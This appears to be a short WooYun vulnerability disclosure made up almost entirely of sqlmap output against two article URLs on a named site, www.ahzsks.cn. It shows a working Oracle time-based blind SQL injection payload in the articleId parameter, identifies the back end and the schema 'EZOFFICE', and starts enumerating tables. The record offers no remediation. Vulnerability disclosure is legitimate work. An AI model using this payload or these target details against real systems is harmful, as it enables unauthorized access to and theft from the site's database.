WooYun.org

www.ahzsks.cn/Examination1/article.jsp?articleId=244718353

http://www.ahzsks.cn/zhengce/article.jsp?articleId=245378897

sqlmap identified the following injection points with a total of 88 HTTP(s) requ
ests:
---
Place: GET
Parameter: articleId
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: articleId=244718353 AND 2469=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CH
R(121)||CHR(105)||CHR(119),5)
---
[23:45:20] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle

current schema (equivalent to database on Oracle):    'EZOFFICE'

web application technology: Nginx, JSP
back-end DBMS: Oracle
[23:53:36] [INFO] fetching tables for database: 'EZOFFICE'
[23:53:36] [INFO] fetching number of tables for database 'EZOFFICE'
[23:53:36] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[23:53:48] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[23:53:59] [INFO] adjusting time delay to 2 seconds due to good response times
698
[23:54:15] [INFO] retrieved: C
[23:54:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
MS_